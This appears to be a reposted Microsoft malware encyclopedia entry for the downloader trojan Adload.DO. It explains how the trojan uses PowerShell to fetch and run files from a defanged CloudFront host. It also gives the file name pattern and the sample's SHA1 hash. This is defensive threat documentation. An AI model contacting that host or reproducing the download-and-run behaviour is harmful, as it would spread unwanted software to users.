Home / malware TrojanDownloader:Win32/Adload.DO
First posted on 20 April 2017.
Source: MicrosoftAliases :
There are no other names known for TrojanDownloader:Win32/Adload.DO.
Explanation :
Installation
This malware downloads random files from hxxp://d2hrpnfyb3wv3kcloudfront net, and then runs it in the infected system.
We have observed that this malware:
- Is distributed by or with potentially unwanted applications
- Goes with the file name with *amd.exe suffix
Payload
Downloads malware or potentially unwanted application
This threat can download other malware or potentially unwanted application onto your PC.
It triggers a PowerShell instance to download random files from hxxp://d2hrpnfyb3wv3kcloudfront net.
Downloaded files are then saved into the Temporary Internet Files folder of your PC's current user. The downloaded files may be other members of Win32/Adload family or other potentially unwanted applications.
Connects to a remote host
We have seen this threat connect to a remote host, including:
- hxxp://d2hrpnfyb3wv3k
cloudfront net
Malware can connect to a remote host to do any of the following:
- Check for an Internet connection
- Download and run files (including updates or other malware)
- Report a new infection to its author
- Receive configuration or other data
This malware description was published based on the analysis of file SHA1 D9E57B9B526908CD3723CD6A7FC259A8BCE809CF.
Analysis by Zarestel FerrerLast update 20 April 2017
